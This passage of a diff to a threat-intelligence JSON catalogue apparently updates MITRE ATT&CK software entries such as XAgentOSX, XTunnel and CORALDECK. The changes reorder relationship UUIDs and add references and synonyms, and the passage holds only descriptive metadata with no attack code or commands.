"estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "26fed817-e7bf-41f9-829a-9075ffac45c2", @@ -10389,13 +12134,6 @@ ], "type": "uses" }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ @@ -10403,13 +12141,6 @@ ], "type": "uses" }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -10418,7 +12149,14 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10438,34 +12176,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -10473,13 +12183,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", "tags": [ @@ -10487,6 +12190,34 @@ ], "type": "uses" }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ @@ -10494,20 +12225,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -10516,14 +12233,42 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10556,48 +12301,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ @@ -10606,7 +12309,7 @@ "type": "uses" }, { - "dest-uuid": "246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10619,6 +12322,13 @@ ], "type": "uses" }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -10627,7 +12337,42 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10688,13 +12433,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -10702,27 +12440,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", "tags": [ @@ -10731,7 +12448,14 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10743,6 +12467,27 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "e9e9bfe2-76f4-4870-a2a1-b7af89808613", @@ -10772,14 +12517,14 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10827,56 +12572,14 @@ "type": "uses" }, { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10897,35 +12600,35 @@ "type": "uses" }, { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10939,14 +12642,21 @@ "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -10960,7 +12670,42 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11071,14 +12816,14 @@ "type": "uses" }, { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11126,14 +12871,21 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11147,14 +12899,7 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11217,7 +12962,28 @@ "type": "uses" }, { - "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11237,20 +13003,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ @@ -11265,13 +13017,6 @@ ], "type": "uses" }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ @@ -11280,7 +13025,7 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11291,7 +13036,7 @@ "value": "Crimson - S0115" }, { - "description": "[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX)", + "description": "[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)", "meta": { "external_id": "S0161", "mitre_platforms": [ @@ -11299,10 +13044,12 @@ ], "refs": [ "https://attack.mitre.org/software/S0161", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" ], "synonyms": [ - "XAgentOSX" + "XAgentOSX", + "OSX.Sofacy" ] }, "related": [ @@ -11321,28 +13068,7 @@ "type": "uses" }, { - "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11355,27 +13081,6 @@ ], "type": "uses" }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -11389,6 +13094,48 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "59a97b15-8189-4d51-9404-e1ce8ea4a069", @@ -11432,6 +13179,20 @@ ], "type": "uses" }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -11453,20 +13214,6 @@ ], "type": "uses" }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -11475,14 +13222,14 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11501,12 +13248,14 @@ ], "refs": [ "https://attack.mitre.org/software/S0117", - "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" ], "synonyms": [ "XTunnel", + "Trojan.Shunnael", "X-Tunnel", "XAPS" ] @@ -11533,13 +13282,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", "tags": [ @@ -11548,7 +13290,21 @@ "type": "uses" }, { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11569,7 +13325,7 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11581,13 +13337,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "7343e208-7cab-45f2-a47b-41ba5e2f0fab", @@ -11637,20 +13386,6 @@ ], "type": "uses" }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -11658,6 +13393,13 @@ ], "type": "uses" }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -11665,6 +13407,13 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ @@ -11701,14 +13450,14 @@ "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11722,7 +13471,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -11733,7 +13482,7 @@ "value": "Nidiran - S0118" }, { - "description": "[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [ScarCruft](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)", + "description": "[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)", "meta": { "external_id": "S0212", "mitre_platforms": [ @@ -11824,13 +13573,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "451a9977-d255-43c9-b431-66de80130c8c", "tags": [ @@ -11838,26 +13580,33 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "3d8e547d-9456-4f32-a895-dc86134e282f", "value": "Umbreon - S0221" }, { - "description": "[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [ScarCruft](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)", + "description": "[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by 